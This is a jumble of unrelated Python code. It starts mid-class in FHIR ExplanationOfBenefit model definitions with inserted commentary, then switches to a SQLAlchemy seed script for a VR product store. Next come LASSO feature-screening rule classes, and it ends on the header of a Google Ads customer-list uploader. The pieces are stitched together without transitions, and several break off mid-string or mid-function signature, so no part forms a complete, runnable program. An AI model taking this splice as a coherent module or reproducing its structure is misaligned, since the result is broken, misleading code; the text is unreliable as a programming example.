""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.allowedMoney = None
""" Benefits allowed.
Type `Money` (represented as `dict` in JSON). """
self.allowedString = None
""" Benefits allowed.
Type `str`. """
self.allowedUnsignedInt = None
""" Benefits allowed.
Type `int`. """
self.type = None
""" Benefit classification.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.usedMoney = None
""" Benefits used.
Type `Money` (represented as `dict` in JSON). """
self.usedUnsignedInt = None
""" Benefits used.
Type `int`. """
super(ExplanationOfBenefitBenefitBalanceFinancial, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitBenefitBalanceFinancial, self).elementProperties()
js.extend([
("allowedMoney", "allowedMoney", money.Money, False, "allowed", False),
("allowedString", "allowedString", str, False, "allowed", False),
("allowedUnsignedInt", "allowedUnsignedInt", int, False, "allowed", False),
("type", "type", codeableconcept.CodeableConcept, False, None, True),
("usedMoney", "usedMoney", money.Money, False, "used", False),
("usedUnsignedInt", "usedUnsignedInt", int, False, "used", False),
])
return js
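Each ``elementProperties()`` tuple above has the layout ``(attribute, json_name, type, is_list, one_of_many_group, required)``. A hypothetical mini-check showing how such a property table can drive validation of an incoming JSON dict (not the fhirclient implementation, just the idea):

```python
# Tuple layout mirrors the tables above:
# (attribute, json_name, type, is_list, one_of_many_group, required)
PROPS = [
    ("type", "type", dict, False, None, True),
    ("allowedMoney", "allowedMoney", dict, False, "allowed", False),
    ("allowedString", "allowedString", str, False, "allowed", False),
    ("allowedUnsignedInt", "allowedUnsignedInt", int, False, "allowed", False),
]

def missing_required(jsondict, props):
    # Report required json names absent from the input dictionary.
    return [json_name
            for (_attr, json_name, _typ, _is_list, _group, required) in props
            if required and json_name not in jsondict]
```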
class ExplanationOfBenefitCareTeam(backboneelement.BackboneElement):
""" Care Team members.
The members of the team who provided the products and services.
"""
resource_type = "ExplanationOfBenefitCareTeam"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.provider = None
""" Practitioner or organization.
Type `FHIRReference` (represented as `dict` in JSON). """
self.qualification = None
""" Practitioner credential or specialization.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.responsible = None
""" Indicator of the lead practitioner.
Type `bool`. """
self.role = None
""" Function within the team.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.sequence = None
""" Order of care team.
Type `int`. """
super(ExplanationOfBenefitCareTeam, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitCareTeam, self).elementProperties()
js.extend([
("provider", "provider", fhirreference.FHIRReference, False, None, True),
("qualification", "qualification", codeableconcept.CodeableConcept, False, None, False),
("responsible", "responsible", bool, False, None, False),
("role", "role", codeableconcept.CodeableConcept, False, None, False),
("sequence", "sequence", int, False, None, True),
])
return js
class ExplanationOfBenefitDiagnosis(backboneelement.BackboneElement):
""" Pertinent diagnosis information.
Information about diagnoses relevant to the claim items.
"""
resource_type = "ExplanationOfBenefitDiagnosis"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.diagnosisCodeableConcept = None
""" Nature of illness or problem.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.diagnosisReference = None
""" Nature of illness or problem.
Type `FHIRReference` (represented as `dict` in JSON). """
self.onAdmission = None
""" Present on admission.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.packageCode = None
""" Package billing code.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.sequence = None
""" Diagnosis instance identifier.
Type `int`. """
self.type = None
""" Timing or nature of the diagnosis.
List of `CodeableConcept` items (represented as `dict` in JSON). """
super(ExplanationOfBenefitDiagnosis, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitDiagnosis, self).elementProperties()
js.extend([
("diagnosisCodeableConcept", "diagnosisCodeableConcept", codeableconcept.CodeableConcept, False, "diagnosis", True),
("diagnosisReference", "diagnosisReference", fhirreference.FHIRReference, False, "diagnosis", True),
("onAdmission", "onAdmission", codeableconcept.CodeableConcept, False, None, False),
("packageCode", "packageCode", codeableconcept.CodeableConcept, False, None, False),
("sequence", "sequence", int, False, None, True),
("type", "type", codeableconcept.CodeableConcept, True, None, False),
])
return js
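The 6-tuples returned by `elementProperties()` follow the fhirclient descriptor convention: (attribute name, JSON key, type, is_list, "of_many" choice group, required). Members sharing an "of_many" group, such as `diagnosisCodeableConcept` and `diagnosisReference` above (the FHIR `diagnosis[x]` choice), are mutually exclusive variants of which exactly one must be set. A standalone sketch (independent of the fhirclient package; the helper name is made up) of how such choice groups can be validated:

```python
def check_choice_groups(props, values):
    """Return the names of 'of_many' groups that do not have exactly one value set."""
    groups = {}
    for name, _json_name, _typ, _is_list, of_many, _required in props:
        if of_many is not None:
            groups.setdefault(of_many, []).append(name)
    bad = []
    for group, names in groups.items():
        filled = [n for n in names if values.get(n) is not None]
        if len(filled) != 1:
            bad.append(group)
    return bad

# Descriptors mirroring ExplanationOfBenefitDiagnosis above (types elided to dict).
props = [
    ("diagnosisCodeableConcept", "diagnosisCodeableConcept", dict, False, "diagnosis", True),
    ("diagnosisReference", "diagnosisReference", dict, False, "diagnosis", True),
    ("sequence", "sequence", int, False, None, True),
]

print(check_choice_groups(props, {"sequence": 1}))  # ['diagnosis'] - no variant set
```

Setting exactly one of the two `diagnosis[x]` variants makes the check pass; setting none or both flags the group.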
class ExplanationOfBenefitInsurance(backboneelement.BackboneElement):
""" Patient insurance information.
Financial instruments for reimbursement for the health care products and
services specified on the claim.
"""
resource_type = "ExplanationOfBenefitInsurance"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.coverage = None
""" Insurance information.
Type `FHIRReference` (represented as `dict` in JSON). """
self.focal = None
""" Coverage to be used for adjudication.
Type `bool`. """
self.preAuthRef = None
""" Prior authorization reference number.
List of `str` items. """
super(ExplanationOfBenefitInsurance, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitInsurance, self).elementProperties()
js.extend([
("coverage", "coverage", fhirreference.FHIRReference, False, None, True),
("focal", "focal", bool, False, None, True),
("preAuthRef", "preAuthRef", str, True, None, False),
])
return js
class ExplanationOfBenefitItem(backboneelement.BackboneElement):
""" Product or service provided.
A claim line. Either a simple item (a product or service) or a 'group' of
details, which can themselves be simple items or groups of sub-details.
"""
resource_type = "ExplanationOfBenefitItem"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.adjudication = None
""" Adjudication details.
List of `ExplanationOfBenefitItemAdjudication` items (represented as `dict` in JSON). """
self.bodySite = None
""" Anatomical location.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.careTeamSequence = None
""" Applicable care team members.
List of `int` items. """
self.category = None
""" Benefit classification.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.detail = None
""" Additional items.
List of `ExplanationOfBenefitItemDetail` items (represented as `dict` in JSON). """
self.diagnosisSequence = None
""" Applicable diagnoses.
List of `int` items. """
self.encounter = None
""" Encounters related to this billed item.
List of `FHIRReference` items (represented as `dict` in JSON). """
self.factor = None
""" Price scaling factor.
Type `float`. """
self.informationSequence = None
""" Applicable exception and supporting information.
List of `int` items. """
self.locationAddress = None
""" Place of service or where product was supplied.
Type `Address` (represented as `dict` in JSON). """
self.locationCodeableConcept = None
""" Place of service or where product was supplied.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.locationReference = None
""" Place of service or where product was supplied.
Type `FHIRReference` (represented as `dict` in JSON). """
self.modifier = None
""" Product or service billing modifiers.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.net = None
""" Total item cost.
Type `Money` (represented as `dict` in JSON). """
self.noteNumber = None
""" Applicable note numbers.
List of `int` items. """
self.procedureSequence = None
""" Applicable procedures.
List of `int` items. """
self.productOrService = None
""" Billing, service, product, or drug code.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.programCode = None
""" Program the product or service is provided under.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.quantity = None
""" Count of products or services.
Type `Quantity` (represented as `dict` in JSON). """
self.revenue = None
""" Revenue or cost center code.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.sequence = None
""" Item instance identifier.
Type `int`. """
self.servicedDate = None
""" Date or dates of service or product delivery.
Type `FHIRDate` (represented as `str` in JSON). """
self.servicedPeriod = None
""" Date or dates of service or product delivery.
Type `Period` (represented as `dict` in JSON). """
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from models import *
engine = create_engine('postgresql://catalog:catalog@localhost:5432/catalog')
base.Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Create a first user for entering items
user = user.User(name="Chris", email="<EMAIL>")
session.add(user)
session.commit()
# Create a first store to associate products with
store = store.Store(name="Virtual Reality Store", user_id=1)
session.add(store)
session.commit()
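The add-then-commit pattern used throughout this seed script can be exercised end to end without the project's `models` package. A self-contained sketch with an in-memory SQLite database (the `User` model here is a minimal stand-in, and the email is a placeholder, not the real data):

```python
from sqlalchemy import Column, Integer, String, create_engine
from sqlalchemy.orm import declarative_base, sessionmaker

Base = declarative_base()

class User(Base):
    __tablename__ = 'user'
    id = Column(Integer, primary_key=True)
    name = Column(String(250), nullable=False)
    email = Column(String(250), nullable=False)

# In-memory SQLite instead of the PostgreSQL catalog database above.
engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

session.add(User(name='Chris', email='chris@example.com'))
session.commit()

# The committed row can be read back immediately, with its generated key.
first = session.query(User).filter_by(name='Chris').one()
print(first.id)  # 1
```

The same flow applies to the `Store` and `Product` rows below; their `user_id=1` and `store_id=1` foreign keys rely on the auto-incremented primary keys assigned at commit time.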
# Create items to populate the product list
# Item information compiled from Amazon.com and Steampowered.com
item = product.Product(name="Samsung Gear VR",
category="Hardware",
description="""Lightweight so you can play and watch more
comfortably. Easy-to-use touch pad, wide field of view, precise
head-tracking and low latency bring reality to the virtual. Be
transported to amazing new worlds, in games, video and images.
Thousands of 360 degree panoramic photos. Compatible with:
Samsung Galaxy S7, S7 edge, Note5, S6 edge+, S6, S6 edge. Improved
fit, including room for most eyeglasses and improved padding for
extra comfort and durability.""",
price="$59.99",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item2 = product.Product(name="Plustore 3D Virtual Reality Glasses",
category="Hardware",
description="""Revolutionary optical system - it completely
eliminates the feeling of vertigo. Fits everyone's eyes: Pupil
settings for the best 3D experience, even to those near-sighted.
Innovative, comfortable wearable design - adjustable straps for
flexible wear and a super light weight of 156g. Turn your
smartphone into a virtual reality viewer. Enjoy real 360-degree
videos and immersive world of VR from the comfort of your home.
Adaptable - adaptable for Android and iOS smart phones with the
screen size being "4.7-6" inches and pixels over 1280*720.""",
price="$16.88",
store_id=1,
user_id=1)
session.add(item2)
session.commit()
item3 = product.Product(name="SARLAR 3D VR Glasses",
category="Hardware",
description="""TAKE CARE OF YOUR EYES AND PUT ZERO
PRESSURE - The lower eyelid is the weakest part of the eyes. Based
on human engineering, the position of the regular headband was
redesigned to relieve the load on the nose bridge and eyelid and
so alleviate the feeling of fatigue. OVERSIZED VISUAL ANGLE
GETS YOU IMMERSED - FOV102 panoramic view, and the screen is
magnified 5.2 times, so the super vision will give you an
unlimited world, incredible visual fidelity and an immersive
feeling. NO ADJUSTMENTS ARE NEEDED FOR THE MIDDLE LINE OF DOUBLE
SCREENS - The supporting structure for mobile phones on the left
and right, together with gear adjustment, can perfectly immobilize
the phone. It also supports phones of larger sizes. There is no
need to adjust the position of mobile phones after the first
adjustment; the middle-line adjustment is simple, and the design
is humanized and awesome. ASPHERIC LENS DESIGN, FRAMES WILL BE
MORE COMFORTABLE - With the aspheric lens design, the frame has no
abnormalities and perfectly fits visual habits, so no spinning
sensation is generated when wearing it. High adjustment, no
ghosting. COMPATIBLE WITH ALMOST ALL MOBILE PHONES - Sarlar VR
glasses are small in size but support large phones of various
brands and types, compatible with almost all mobile phones. They
are suitable for any smartphone whose screen size is from
4.0-6.5", whose length doesn't exceed 175mm and whose width
doesn't exceed 90mm.""",
price="$19.99",
store_id=1,
user_id=1)
session.add(item3)
session.commit()
item4 = product.Product(name="Cellay 3D VR Goggles",
category="Hardware",
description="""Glasses-free: No eyeglasses are needed if your
visual acuity is under 600 degrees. IMAX Effect: Anti-distortion
aspheric design, lowering distortion and letting you enjoy a 3D
IMAX world. Adjustable Distance: The VR virtual reality headset
can adjust focal length and pupil distance to suit
different people. T-shaped Strap: It helps you reduce the
pressure around your eyes and is suitable for almost everyone.
Compatible with: the VR helmet fits smartphones such as Apple and
Android phones with screens between 4.0~6.5 inches.""",
price="$33.45",
store_id=1,
user_id=1)
session.add(item4)
session.commit()
item5 = product.Product(name="Google Cardboard",
category="Hardware",
description="""GOOGLE CARDBOARD is the primary experience
version of 3D VR Glasses. It's made from the AAA grade
corrugated paper, which is the strongest material. Our product is
the highest quality for this price on the market. WE HAVE
ADVANCED GOOGLE CARDBOARD according to advice from customers
and tested it over 80 times. We added a longer head strap,
suction cups and forehead pad. So far, we have sold more than
500,000 sets. COMPATIBLE WITH all 3.5"-6.0" smartphones.
Whether your phone system is Android system or other systems,
you can use the TOPMAXION Cardboard to watch Left-right 3D
movies on Video Player and play varieties of VR games. IN ORDER
TO EXPERIENCE HIGH QUALITY 3D FEELING, you'd better use high
resolution smartphones. Experience a truly stunning, engrossing
VR experience with cinematic HD visuals from your smart phone's
screen using the included biconvex lenses offering a 37 mm focal
length for the best visuals! THE PERFECT SOLUTION for Virtual
Reality on a budget! Box-style package with good portability,
easily take anywhere.""",
price="$9.99",
store_id=1,
user_id=1)
session.add(item5)
session.commit()
item = product.Product(name="Oculus Rift",
category="Hardware",
description="""Oculus Rift's advanced display technology
combined with its precise, low-latency constellation tracking
system enables the sensation of presence. Customizable,
comfortable, adaptable, and beautiful, Rift is technology and
design as remarkable as the experiences it enables. Every aspect
of Rift was designed to be easy, inviting, and comfortable to
use - and that extends to the VR environment we've created as a
starting point for your journeys. Discover and download games
across genres ranging from action RPGs, sci-fi shooters,
mind-bending puzzle games, and more - and play them from an
entirely new perspective. Lucky's Tale is included with every
Rift purchase. Windows PC and an internet connection are
required for Oculus Rift - please review recommended system
specs.""",
price="$599.00",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="HTC Vive",
category="Hardware",
description="""Vive is built from the ground up for room-scale
VR, which allows you to physically move around objects in the
virtual space. With more than 500 games and growing for SteamVR,
everything you love about Steam is now available in VR. The
Gallery: Call of the Starseed, Tilt Brush and Zombie Training
Simulator come with Vive for free. An adjustable headset and
multiple eye relief adjustments, including lens distance and
IPD, to make Vive comfortable and clear. Wireless controllers
designed specifically for VR make interactions with objects
natural and intuitive. Enjoy a safe, convenient experience with
Chaperone bounds of your play area, a front-facing camera to
view the real world and notifications from your phone in VR.
Compatible Windows computer and internet connection
required-refer to the recommended computer specs below.""",
price="$799.99",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="Virtual Reality Insider: Guidebook for the VR Industry",
category="Reference",
description="""Virtual reality is as explosive a technology as
the Internet! Are you working in the VR industry, or curious to
find out more about it? VR Insider is an overview and guidebook
for consumer virtual reality. For the industry veteran, it is
the perfect book to stir up new ideas and see how the big
picture fits together. For newcomers to VR, it is the fastest
way to catch up on what is happening and figure out how to apply
your skills. Affordable virtual reality hardware finally exists,
and this book will help you create its content! Best of all,
this book is readable in 1-2 hours!""",
price="$8.99",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="""Learning Virtual Reality: Developing Immersive
Experiences and Applications for Desktop, Web, and Mobile""",
category="Reference",
description="""As virtual reality approaches mainstream consumer
use, a vibrant development ecosystem has emerged in the past few
years. This hands-on guide takes you through VR development
essentials for desktop, mobile, and browser-based applications.
You'll explore the three go-to platforms-OculusVR, Gear VR, and
Cardboard VR-as well as several VR development environments,
programming tools, and techniques. If you're an experienced
programmer familiar with mobile development, this book will help
you gain a working knowledge of VR development through clear and
simple examples. Once you create a complete application in the
final chapter, you'll have a jumpstart on the next major
entertainment medium.""",
price="$26.01",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="The VR Book: Human-Centered Design for Virtual Reality",
category="Reference",
description="""Without a clear understanding of the human side
of virtual reality (VR), the experience will always fail. The VR
Book bridges this gap by focusing on human-centered design.
Creating compelling VR applications is an incredibly complex
challenge. When done well, these experiences can
# adascreen/screening_rules.py
import numpy as np
class AbstractScreeningRule(object):
""" Base class for LASSO screening rules. """
tol = 1e-9 # tolerance
name = 'None' # name of associated lasso screening rule
isComplete = True # does NOT screen out possibly non-zero coefficients
def __init__(self, name, complete=True, tol=1e-9):
self.tol = tol
self.name = name
self.isComplete = complete
def is_complete(self):
# the boolean attribute set in __init__ shadows any method named
# isComplete, so the accessor uses a distinct name
return self.isComplete
def isFirstIter(self, l0, lmax):
return abs(l0-lmax) < self.tol
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# returns indices of non-screened features and (updated) intervals
raise NotImplementedError('Lasso Screening Rule {0} does not implement screen().'.format(self.name))
def get_local_halfspaces(self, o, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('Lasso Screening Rule {0} has no local halfspace constraints.'.format(self.name))
def get_global_halfspaces(self, lmax, lmax_x, X, y, normX, normy):
raise NotImplementedError('Lasso Screening Rule {0} has no global halfspace constraints.'.format(self.name))
def init(self, lmax, lmax_x, X, y, normX, normy, path):
# in case for cache etc..
print('Screening ({0}): nothing to initialize.'.format(self.name))
def release(self):
# in case for cache etc..
print('Screening ({0}): nothing to release.'.format(self.name))
def __str__(self):
return '{0}'.format(self.name)
def __name__(self):
return '{0}'.format(self.name)
class AbstractSphereScreeningRule(AbstractScreeningRule):
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
(o, r) = self.get_sphere(l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals)
inds = np.where(np.abs(X.dot(o)) >= 1.0 - normX*r - self.tol)[0]
return (inds, intervals)
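The sphere test in `AbstractSphereScreeningRule.screen` keeps feature row x_j whenever |x_j . o| >= 1 - ||x_j|| * r, i.e. whenever the dual constraint for that feature could still be active anywhere inside the safe sphere of center o and radius r. A numeric sketch with made-up values (unit-norm feature rows, arbitrary center and radius):

```python
import numpy as np

# Feature rows of X are unit-norm, as assumed by the screening bound.
tol = 1e-9
X = np.array([[1.0, 0.0],
              [0.0, 1.0],
              [np.sqrt(0.5), np.sqrt(0.5)]])
normX = np.linalg.norm(X, axis=1)   # [1., 1., 1.]
o = np.array([0.99, 0.0])           # sphere center (dual estimate)
r = 0.05                            # sphere radius

# Same test as in screen(): |X o| >= 1 - normX * r (minus tolerance).
inds = np.where(np.abs(X.dot(o)) >= 1.0 - normX * r - tol)[0]
print(inds)  # [0] - only the first feature survives screening
```

The other two features are provably inactive for this sphere and can be discarded before solving the LASSO problem.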
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('Lasso Screening Rule {0} has no sphere constraint.'.format(self.name))
class ScreenDummy(AbstractScreeningRule):
""" No screening at all. """
inds = None
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'None', tol=tol)
def init(self, lmax, lmax_x, X, y, normX, normy, path):
self.inds = np.arange(X.shape[0])
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
return (self.inds, intervals)
class SAFE(AbstractSphereScreeningRule):
""" <NAME>i et al. (2010) """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'SAFE', tol=tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# lhs = np.abs(X.dot(y))
# rhs = l - normX * normy * (lmax - l)/lmax
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
o = y/lmax
rho = (1.0/l - 1.0/lmax)*normy
return (o, rho)
class SeqSAFE(AbstractScreeningRule):
""" <NAME> et al. (2010) """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'SeqSAFE', tol=tol)
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
theta0 = (y - X[nz,:].T.dot(beta[nz]))
a0 = theta0.T.dot(theta0)
b0 = np.abs(y.T.dot(theta0))
D = a0*np.maximum(b0/a0 - l/l0, 0.0)**2.0 + y.T.dot(y) - (b0*b0)/a0
rhs = np.abs(X.dot(y)) + np.sqrt(D)*normX
inds = np.where(l < rhs - self.tol)[0]
return (inds, intervals)
class DPP(AbstractSphereScreeningRule):
""" Screening by Dual Polytope Projection """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'DPP', tol=tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# # Original [d]ual [p]olytope [p]rojection
# # get the former dual solution
# theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# # screen
# lhs = np.abs(X.dot(theta))
# mul = np.abs(1.0/l - 1.0/l0) * normy
# rhs = 1.0 - normX * mul
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# get the former dual solution
o = (y - X[nz,:].T.dot(beta[nz])) / l0
rho = np.abs(1.0/l - 1.0/l0) * normy
return (o, rho)
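A property worth noting in the DPP sphere above: at l == l0 the radius |1/l - 1/l0| * ||y|| is exactly zero, so the safe region degenerates to the previous dual point, and it grows as l moves away from l0 along the regularization path. A quick sketch with illustrative numbers:

```python
# rho = |1/l - 1/l0| * normy for a few values of l along the path.
normy = 2.0
l0 = 1.0
rhos = [abs(1.0 / l - 1.0 / l0) * normy for l in (1.0, 0.9, 0.5)]
print(rhos)  # [0.0, ~0.222, 2.0] - radius grows as l leaves l0
```

Smaller radii mean tighter safe regions and therefore more features screened out, which is why sequential rules like DPP work best with closely spaced path values.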
class StrongRule(AbstractSphereScreeningRule):
""" Tibshirani et al. (2012): Strong Rules for Discarding Predictors in Lasso-type Problems """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'Strong', complete=False, tol=tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# lhs = np.abs(X.dot(theta))
# rhs = 2.0*l/l0 - 1.0
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
theta = (y - X[nz,:].T.dot(beta[nz])) / l0
rho = 2.0 * (1.0 - l/l0)
#print l/l0
return (theta, rho)
class DOME(AbstractScreeningRule):
""" Screening by DOME rule.
Xiang and Ramadge (2012)
One-shot method
"""
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'DOME', tol=tol)
print('Warning! Dome-screening is *not* optimized.')
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
inds = []
for i in range(X.shape[0]):
t = X[i,:].dot(lmax_x)
val = X[i,:].dot(y)
r = np.sqrt(np.maximum(1.0/(lmax*lmax) - 1.0, 0.0)) * (lmax/l - 1.0)
ql = self.__Ql(t, l, lmax, r)
qu = self.__Qu(t, l, lmax, r)
if ql>=val-self.tol or val>=qu-self.tol:
inds.append(i)
return (inds, intervals)
def __Ql(self, t, l, lmax, r):
if t<=lmax:
if 1.0-t*t<0.0:
#print 1.0-t*t
return (lmax-l)*t - l
return (lmax-l)*t - l + l*r*np.sqrt(1.0-t*t)
return -(l-1.0 + l/lmax)
def __Qu(self, t, l, lmax, r):
if t<-lmax:
return (l-1.0 + l/lmax)
if 1.0-t*t<0.0:
#print 1.0-t*t
return (lmax-l)*t + l
return (lmax-l)*t + l - l*r*np.sqrt(1.0-t*t)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
#q = y/l - (lmax/l - 1.0)*lmax_x
#r = np.sqrt(1.0/(lmax*lmax) - 1.0) * (lmax/l - 1.0)
q = y/lmax
r = normy*(1.0/l - 1.0/lmax)
# include normy in the sqrt? (like in the ST3 rule) ??
return (q, r)
def get_local_halfspaces(self, o, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
n0 = lmax_x
norm_n0 = np.linalg.norm(n0)
c0 = np.array([1.0])
n0 = n0.reshape(1, len(y))
return (n0, c0, norm_n0)
def get_global_halfspaces(self, lmax, lmax_x, X, y, normX, normy):
n0 = lmax_x
norm_n0 = np.linalg.norm(n0)
c0 = np.array([1.0])
n0 = n0.reshape(1, len(y))
return (n0, c0, norm_n0)
class ST3(DOME):
""" Screening by ST3 rule.
"""
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'ST3', tol=tol)
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('ST3 standalone screening not implemented.')
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
theta_max = y/lmax
o = theta_max - (lmax/l - 1.0)*lmax_x
rho = np.sqrt((normy*normy)/(lmax*lmax) - 1.0) * (lmax/l - 1.0)
return (o, rho)
class HSConstr(AbstractScreeningRule):
max_constr = 10
def __init__(self, max_constr=10, tol=1e-9):
AbstractScreeningRule.__init__(self, 'DualLasso({0})'.format(max_constr), tol=tol)
self.max_constr = max_constr
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('HSConstr only returns halfspace constraints.')
def get_local_halfspaces(self, o, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
if not self.isFirstIter(l0, lmax):
ak = np.concatenate((X[nz,:], -X[nz,:]))
bk = np.ones(2*nz.size)
normak = np.linalg.norm(ak, axis=1)
# find the 'max_constr' ak with the lowest value
inds = np.argsort(normak[:len(nz)])
inds = inds[:np.min([inds.size, self.max_constr])]
inds = np.concatenate((inds, inds+len(nz)))
ak = ak[inds,:]
bk = bk[inds]
normak = normak[inds]
else:
ak = np.array([lmax_x, -lmax_x])
bk = np.ones(2)
normak = np.linalg.norm(ak, axis=1)
return (ak, bk, normak)
class IDPP(DPP):
""" Interval Screening by Dual Polytope Projection """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'IDPP', tol=tol)
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# [i]nterval [d]ual [p]olytope [p]rojection
# old dual solution
theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# screen only active features
minds = np.where(intervals >= l)[0]
lhs = np.abs(X[minds,:].dot(theta))
mul = normX[minds] * normy
xminl = mul / (1.0 + mul / l0 - lhs - self.tol)
# update intervals of active features
nintervals = np.array(intervals)
nintervals[minds] = xminl
# find violators within the active set
inds = minds[np.where(xminl >= l)[0]]
return (inds, nintervals)
class EDPP(AbstractSphereScreeningRule):
""" Enhanced Screening by Dual Polytope Projection """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'EDPP', tol=tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# # [e]nhanced [d]ual [p]olytope [p]rojection
# # old dual solution
# theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# v1 = y / l0 - theta
# if abs(lmax-l0) < self.tol:
# v1 = lmax_x * np.sign(lmax_x.T.dot(y))
# v2 = y/l - theta
# v2t = v2 - v1 * v1.T.dot(v2) / v1.T.dot(v1)
# lhs = np.abs(X.dot(theta + 0.5*v2t))
# rhs = 1.0 - 0.5*normX*np.linalg.norm(v2t)
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y,
#!/usr/bin/env python
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adds user lists and populates them with customer's CRM contact information.
Note: It may take several hours for the list to be populated with members. Email
addresses must be associated with a Google account. For privacy purposes, the
user list size will show as zero until the list has at least 1000 members. After
that, the size will be rounded to the two most significant digits.
"""
import argparse
import csv
import hashlib
from google.ads.googleads.client import GoogleAdsClient
from google.ads.googleads.errors import GoogleAdsException
# CSV Headers (Change if needed)
HEADER_LINE = True
EMAIL = 'Email'
PHONE = 'Phone'
MOBILE_ID = 'MobileId'
USER_ID = 'UserId'
FIRST_NAME = 'FirstName'
LAST_NAME = 'LastName'
COUNTRY_CODE = 'CountryCode'
ZIP_CODE = 'ZipCode'
LIST_NAME = 'List'
